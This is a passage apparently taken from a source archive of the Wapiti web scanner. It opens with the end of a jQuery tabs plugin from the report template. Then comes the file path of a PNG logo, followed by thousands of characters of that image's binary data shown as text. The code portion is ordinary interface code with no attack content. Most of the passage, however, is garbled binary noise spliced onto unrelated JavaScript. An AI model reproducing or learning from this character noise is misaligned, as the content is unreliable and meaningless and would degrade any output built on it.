    $.fn.tabs = function(option) {
        return this.each(function() {
            var $obj = $(this);
            var data = $obj.data('tabs');
            if (!data) {
                $obj.data('tabs', (data = new Tabs(this, option)));
            }
        });
    };

    // Initialization
    var Tabs = function(element, options) {
        // Element
        this.$el = $(element);

        // Options
        this.opts = $.extend({
            height: false,
            active: false
        }, options, this.$el.data());

        // Init
        this.init();
    };

    // Functionality
    Tabs.prototype = {
        // Initialization
        init: function() {
            this.links = this.$el.find('a');
            this.tabs = [];

            this.links.each($.proxy(function(i,s) {
                var hash = $(s).attr('href');
                this.tabs.push(hash);

                if (!$(s).hasClass('active')) $(hash).hide();

                // option active
                if (this.opts.active !== false && this.opts.active === hash) {
                    this.show(s, hash);
                }

                $(s).click($.proxy(function(e) {
                    e.preventDefault();
                    this.show(s, hash);
                }, this));
            }, this));

            // option equal
            if (this.opts.height === 'equal') {
                this.setMaxHeight(this.getMaxHeight());
            }
        },
        active: function(tab) {
            this.links.removeClass('active');
            $(tab).addClass('active');
        },
        show: function(tab, hash) {
            this.hide();
            $(hash).show();
            this.active(tab);
        },
        hide: function() {
            $.each(this.tabs, function() {
                $(this).hide();
            });
        },
        setMaxHeight: function(height) {
            $.each(this.tabs, function() {
                $(this).css('min-height', height + 'px');
            });
        },
        getMaxHeight: function() {
            return Math.max.apply(null, $(this.tabs).map(function() {
                return $(this).height();
            }).get());
        }
    };

    $(function() {
        $('nav[data-toggle="tabs"]').tabs();
    });
}(window.jQuery);

wapiti-2.3.0+dfsg/wapitiCore/report_template/logo_clear.png
U+< HDU("e}LbN)"7[]*8"9v&4!ިuR"?q8|"-fE$wusKI_L ]CW?ko{;a)4qE8nbdpZ̺VwN#"h\&~XW_ZK}a?Om= "O}=A֐_xQδ'2ȫTb؝_D< `:[!jZ9ʩ3#tji buJ-2߭W"0$FuGEb b2OǬqXDI2X] c떌k䮩et/5l~E*oD*4p/ y1:Q(< nsNi <肉=V۰cj>-|-3Wr#܀5ቊ*G$=3?7.V2X 6֭' VVE"[Q..>H^ Yb"niݏr)tbΖC/3M_`6+3ʄ URv=Yդs.끣Zcc:W5}Kz-)TJ1²$lhG;Jp-t㸌VMLuu(|Rlw5@)HPu<`-End5fb}vs+ AbUأ<);CUtI]hh7d "ҲRChp#.NAݗ/Q3^!:SDI>e>~X*@lKZ8Zq5zf&X@?LyWܯ?AN˻ s"xBA@ Ej=#2EuV|q\sU7!kՈPo4(\Ϯѵ~ 4uPUCRC3^?wVe<&vuE0}[)& !.uBXt/kc-/,cVDخe}̽{\]Qku[Ӷ@*4*2!l^ݷPY,teZ`Zk+(0Fw 2o>Ne}EuN}~ψPVDH9H R{'<o`(!"wTuA Y^b3#R ]IU{=>~iu Ҭj5 HycRs{+QaEfy0x6@6ǂ{ĴkTS }M ~F IDATLri܇'htoq/oc|5Y¯w\ FKLA'fD2ݻt'(HaX}Bڦ˜MG{n&=`nP)6\5#WkV?kIl?}c/Q*fx1yS*XH/Z6;I]D:cSc1Ae;=6IB,hv2xUuؘ&"oLjs/k`/e '%/)ޕmn"Od*]Qˀ@:֬G3^ ,>^+^[8ۣt{t=B bݹ/;J:{Ϙk,-uYWq_ζn L.uRH/R*Ŏ"+a 3Q8e+NbVIezʿHb2];87RwgX1el aZyZ-. =u䆟Xɸ~nCV j,ZHd1, "gC; yP J#c-M!` !i|.FAa}$/S}l~P#'{w~99.Iwai`ZG +W]''hRouߩqQ*IԈ 򺜾!=d\D_I<`BǽE *OUD>Q=7'v'YHCWwecH_yx1WO!; &"USp swᅴHwudy2MRr{;^ "Tu;xڦׁ@>GU ]zbuAU[ҙBbx2s Ƞvq~+Rk`./;coӤk_B7"0}rwq7U1)^s2Zwq̡_7J!*r "ߩҺgjX wŭX ""skdsAV@ԥfAU;V)k6KirnrKӨшo31TD yO4-}A˘Fn2czעE mrPLQ4l^_[dʹ߷)qСp#S x3Fcl ?KvHt_L,%61̞a)d'_]C Z/D%>Ko5zD2v=5Fi A)?g*[^,R "fPNU LnGw,FfluT~ [6kpY PM‰{ ̇㿪%嗵ųuom0K~ сX  8Qr$Єe'jkf{ɜǭ8n6xx5Y{ mU}M]xޕ]sXX_Dmb,VRg}_\ggڧ`$>|w+bl\^UqYdx4qMT=$RӾӵȟ TDYd.ρ݁U5*LD)V9>w}U]AUpԋ/+v+ <}]bQHiQ̝{.υ^%^{d0AZMg, ''lEh:rI^ﮐN 2t+a]Xg''13>e,D@WzUĥ,:I/ݪX>>i{dϰL X]c69VR( 5k )c7h"=ij\|1jq,tg5B w2j%[漶sEy+Yʍ '" Uu|Be%Eڪ7h>WXͲ6~XF8^ULo&lJ}eS,"ׄ%=?O3oق+C&0~"$!%cAYcCyPbc!7'ҪT?<\CDn)F~ω>z;ѲgtXՂs 9+ dPr)lc׀zP ~}|TI5|Σjp/R fQ;x1t0UM WvRK6lz 39+UAǬM#rg:\T"۾,A3U+OUu ],ely9ugȍUlh~~ | cP~NۦCeȠM0CJh8S`X9`>NIM3]1+TO@ /Tz7IW9QN`҇|xH8 ~Xydf(H\P l`Fhzهv=?cGVop{r ŮlExH^pE 59 jioXS0=i*1"垻̿d`\+g٬$4 APmB`2r-~|ת k35fR^[6"H3+.4&u {~|+ʾ4_]ڎ6T~m PZB# cEZT_˘X"Hb2[VU-Ys^Rd]o3DZO齑W}ޱXul˨7S^+Geuϱ rWU]$̃,"##_NXg|%LPyװSTucR@Ls"$ ?^d#*GXbXi伮 -#U~2 fQlH k7zJ sJVV`A%dSB Alm^Hي"5R.!DV=խ`QΧ2uFAo!%VukK漆Ia Hbt UF~}JRc2j0Į/0-<`o ƥKW}5m4 )#Nv[ˤ Bǀ@Ŷ<ld< kS f:a>V"R6` /XqM$=u" J~V2xNuRzI`JSU|4B4KK*k9~H@@ &~Z^m{MDO2?3}YU.mRO^K_@ CL}*} 
/5UUˑ7g*S,}uYӷ) |=A5Ax >,4k7'PY g/"_ ^ײ6FR̅VtmOyִ>Lf㞌zlq'eP Dd,ꅷf Mȕ`hduT`vqr9? mI?,}.8J >UՅRۛ|A'XlԔZ#`2 Ss?^sSj;yEi ]0mS?8KDƥ Ȑ1;n- Xw>AkܵP?ZF:'vZepϝ(NWcݱJׁ3u<2NTD䋔{[ΉTu'6I m>C@ *P/7li %1"&tm~^3vɗ J[R[, SSUuݳnkTt4pDXcwypޛ@}^x}pe\r"j\nT.V1niqQ5}%=X}Rsr˲dMX8)]@;i20-yRNxߟ=W 0*lwZGLݪz%oXyNjˠ0Ps:dN=oLzkQFs) f9q ^yx-UճUuٌ{]FU!)R>pdGXJm5k2&re}{.XXs /QzW3d$߸들-#Y-7U.e_jF1MFs? U2 ,^|XnCw';7&qgXTyj~"i oZSx=`qUs>p V)[2egj[k7ai(dIIVՎXOF XGz`U]E MT5<:\5<)òdM6WES^ecr 9hNOvsq$#EH:?2hS2xW+$[9 p@y<}/lB=iIyÏxz}s{0 pPK|FnXDNuꍥ= JDXQ+̬9M}:ͨ9E@-Q Q^PkڸdJ)v,aD;2m۳;Nmd |Fc28XDM } k hz =/[2F;@ U+3Y`)pKW'h;E̙%X&j9ӯ+"azwزPE@ IZ-Wx|f{~!AK@ug]Ix^HZnl6?XD~+"<%^]|^TXSD %0-ˊ}Ku5Q"rL0Fc4 |3Om㱇z];X~~zÏ 28VUY> J{ w«MDdpGDeۉc\: X,ȁiʮN"&]OC CEsFO{bkywsxuTVpASss+3+伶Te>g!^^,`yuH7zVp0֧2ƥ^qiƊGM9SEu~X"2ĵ/"2¹+Ʇy,cE0mOZ uzVD^,3zan.ikm2^ּ@7uv+hٜmE2?%z'oݺzw3xt]-"`ZXǩk4 xM#?gWDN5, MU*zOyJ-n56x\IJXw7Ԩ 6HwCtXc5f3*cy7g/m_BU~Y%ڼ(M7b `߄0RUE>7HUq"D=UU;aIb.{#yx y 3GL`g5^xBYU7";ۨ\l l/`jVR2Ê"5XVO%TuS,m;Z&Q Vi~1 z-]ˁGDQ>&} ̀ȉ)dxL*zkCw("-z6551rȅJ`̭u&;"tL0Vp 0 HKI|26&,j:MUj'>pvY pAPi,w'mdfzV~`nOknnFUgcF*:m섗Յ-%kU=IDOa@=nK$K,NN{ɑ!'P+p74`gZO82"ժՒEvEd},=zN;a%`EXɂR:/ìdEO'}Fޗw%Θk _\u8۴TJ)뭗w@Z "\ JEu8^O /cdpFo9 56\Mm4ss)sPv~o7_,dsL,~55' ,&%u7Zw\?((]vea描ІC>'aIa<&*N|<3IDATQmWa2Z,y2hGOCUBx F<)vtsW,4|„2`a,(`YG_2dv+a1#XRh<2)&W.[u 8_UL!)罋ݳ((F.>9gK3JvItDhs{M\ZD& کDd?yѯdsz@ LX`i,`;; z2~N^}1]~#c2>%L,{]bA'w7v\$0 NNJkDﷻ4D| "Eޞ4 A@I E=U=(0CUL!C(R#4:g2>7G B[(71 1&yT4"հzaz2(Ogi./BWD׸LtK9Z{YkcEuŰPkcȗrBX?' 
JUuES`w@ "Wb~C|QY*X͘::y]c HZ`|txA)1pN!\V1VL=ͦtFX|d'!@ PՁkL:|vfU5es<#|D!ڧP: >s)AC21F2 nф'P",[qC2]"hD_tqwQ}۽6U=7/"7zEC2u2JX1ØFeVb; y6e֕ҕהq I2J4X;T"5,Z֔TuZ0EwǖP; sE D-[N3q75\r~sDd#𖈼s@ \zl,zo`5ܫ[\?}b}w&%ʉ+9ıaC{'2ʰ *=w7UR) H,,݁ϱ"偽 ']f(_GRL{&:M |L _uW>k%:)7諪Kb_ dP+2 u p'̿#b $`[y!ZZ{Ҳ+fE,>P7k1+E|U9 s-Lvfo@ ZX?0)o;w~L[鲾vK뭬b:9~ quzuqӱb8ID\-nKÃPB }aA &Q 17R=0𰪶rȭK) *.sq_X_xJl"ǎD1 "xsc"dPsy078}+'h2Y:ci#XcWs4|=p-,EdJV@&B:#Lـ@(k,n)VUE{,E:][GUҋ2VЕE^Z8~Rcn{./Vt&JK l .8=8 z3jQX\xU[YzzP6=pg\)$;{W ߋȤ"$UUOw+ 6&`_ nDd7/"!ݒ yO j?u Ŕc.LChnOZLDFkKuCKặNO8D7 7 A@ =Dd/pw"Q3׸7p7fh1{~T5i%XX*ݘgVs05 A@ac9܋ty.?-/cxUu!L\뤱/yRc#دߓ>⊢5kD7"G4;AT_j #"oxqZi"2-puT|0o-#uŀǜ08*"" 1?$ʤ,n"ֲ3‰XJQ=㶩c@@vgban֋紫%w[;ˋP˞/"VxU]sdU+"FXY .."* -cQ  ! V|;b R:q{D|KKIaF/'DU:yj}>pga&2dp3ևx{ "F| < ژD/51һ۸0 m"Xk?5el=s/ذη1 w5,9-_”Z'Y sbw*+ڷ˱Dm}aLLœ dЈp/'9Lc/ ˹1 sFcs-`!Aq ŴB@ M`J<4naxaح nc&2w<[Lֳq s RK\&y}Ljzp"pW*'7V#1f:d&ѱk fW@ ya28|xYvf5;phƧDdx69⚅~N,]w d0CG_,.Fr."h|' :JUIDN 3( A@{$.X}n"~,8d+/q1ɇҿ|~RDn3& A@ 19EdOb6p\8~ ,b;ј0C̯p;0sE8GDHo!qa64"ji@[RZ6wSZT2(A MN ]Tz`ڦb9/ڂP@ :)/^s3> dF-ns~"2,|3 ڞ2k>HZ0OX=M@2h+a/ J 㰆9wA@@cY wY珺X=A@ Jۭ5